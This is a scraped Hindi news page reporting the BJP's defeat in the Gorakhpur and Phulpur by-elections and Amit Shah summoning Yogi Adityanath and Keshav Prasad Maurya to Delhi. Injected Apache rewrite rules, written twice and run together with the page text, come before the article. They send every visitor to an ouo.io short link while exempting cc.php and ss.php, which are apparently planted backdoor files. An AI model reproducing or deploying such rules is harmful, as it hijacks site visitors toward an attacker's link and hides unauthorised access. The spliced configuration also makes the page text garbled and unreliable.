
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 359
Previous Nextलखनऊ। गोरखपुर और फूलपुर उपचुनाव में किरकिरी के बाद अब मुख्यमंत्री योगी आदित्यनाथ और उपमुख्यमंत्री केशव प्रसाद मौर्य की क्लास लगना तय है। भाजपा के राष्ट्रीय अध्यक्ष अमितशाह ने दोनों को दिल्ली तलब किया है। आज शाम पांच बजे तीनों नेताओं की बैठक होगी। माना जा रहा है कि बैठक में वर्ष 2019 में होने वाले लोकसभा चुनाव से ठीक पहले मिली इस हार के कारणों की समीक्षा की जाएगी। मीटिंग में समाजवादी पार्टी और बहुजन समाज पार्टी के गठबंधन के बाद पैदा हुई राजनीतिक चुनौती से निपटने के लिए बीजेपी की रणनीति पर चर्चा होगी। आगामी लोकसभा चुनाव में समाजवादी पार्टी, बहुजन समाज पार्टी, कांग्रेस समेत सभी विपक्षी दलों के महागठबंधन बनने पर क्या रणनीति अपनाई जाए, इसको लेकर भी मीटिंग में चर्चा होगी। आपको बता दें कि 14 मार्च को उपचुनाव के नतीजे आने के बाद 15 मार्च को सीएम योगी आदित्यनाथ ने अपने सभी कार्यक्रमों को रद्द करते हुए केवल अधिकारियों के साथ मैराथन मीटिंग की थी। योगी आदित्यनाथ ने एक साल में लागू की गई सभी योजनाओं की रिपोर्ट मांगी और उनके काम की समीक्षा की। सीएम की इस मीटिंग से अधिकारियों में हडक़ंप मच गया था।
आपको बता दें कि गत बुधवार को आए चुनाव परिणाम में उत्तर प्रदेश की दो सबसे वीआईपी लोकसभा सीटों गोरखपुर और फूलपुर में समाजवादी पार्टी ने बंपर जीत दर्ज कर थी। सीएम योगी आदित्यनाथ के क्षेत्र गोरखपुर से जहां एसपी प्रत्याशी प्रवीन निषाद ने बीजेपी के उपेन्द्र शुक्ल को 21 हजार 881 वोटों से हरा दिया। वहीं फूलपुर में समाजवादी पार्टी प्रत्याशी नागेंद्र पटेल ने 59 हजार से भी अधिक वोटों से जीत हासिल की।